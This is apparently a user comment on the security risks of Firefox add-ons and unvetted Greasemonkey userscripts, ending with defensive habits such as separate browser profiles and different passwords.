Firefox plugins/addons at Mozilla.org have similar problems to userscripts but at least they are formally vetted. The vetting/review includes the all-important code-review. Nevertheless there are clever techniques for avoiding the detection of evil code without the need of obfuscation. Also the addon may be hosted on an (unknown to anyone) hacked site. Unfortunately mozilla also lists 'experimental' addons which are not vetted and have had malicious code. You get a warning but how many know the real significance. I didn't until I picked up security knowledge. I never install such addons.
Userscripts are not formally vetted. Unless a script has a lot of installs I examine the code. Even so a high-install script could still have had the script-writer's account hijacked and script modified. Even if I examine a script the use of anti-detection programming means I may not see the evil. Perhaps the best bet is to examine outgoing requests with "Tamper Data" firefox addon, but a clever script will delay or infrequently send data. It's a tactical war, unfortunately. Ironically only microsoft's certificate based activeX objects really approach a real solution in developer traceability (but didn't go far enough).
It's true that a firefox addon gives an evil-doer greater exposure to potential victims, since firefox addons are generally more popular and so seem more likely to be targeted, but the firefox vetting process makes userscripts more attractive to the evil-doer since they are not vetted. Arguably a low-download userscript can still get a criminal plenty of valuable logins until it is spotted, while also giving the benefit of the relative obscurity and low community churn of userscripts, as well as a low chance of anyone code-reviewing it. You can't depend on firefox addons' popularity to protect you from evil userscripts.
As a non-developer you are dependent on other users spotting evil scripts/addons. How likely is that? Who knows. The truth is it's a crap security model.
Ultimately I use firefox for general browsing and Google Chrome (without greasemonkey/plugins) for admin purposes. Chrome also has a usable 'profiles' feature (totally separate browsing spaces) which is effectively like using different browsers. I've set up three chrome profiles to make myself even more safe: email/general-admin, banking, ebay/paypal. Firefox has unusable profiles (in my experience) but I prefer firefox as a browser which is why I still use it for uncritical browsing. Profiles also protect against old fashioned browser security holes and hacked sites, at least limiting their scope. But make sure you use different passwords. Another approach is a clean bootable ubuntu install on a USB stick for critical admin (see here http://www.geekconnection.org/remastersys/).
Jetpacks' special trust model, rather like the PGP trust network, which underlines the seriousness of this issue, should hopefully mitigate it. Jetpack is firefox's new kid on the block: a kind of super greasemonkey.

Categories

Resources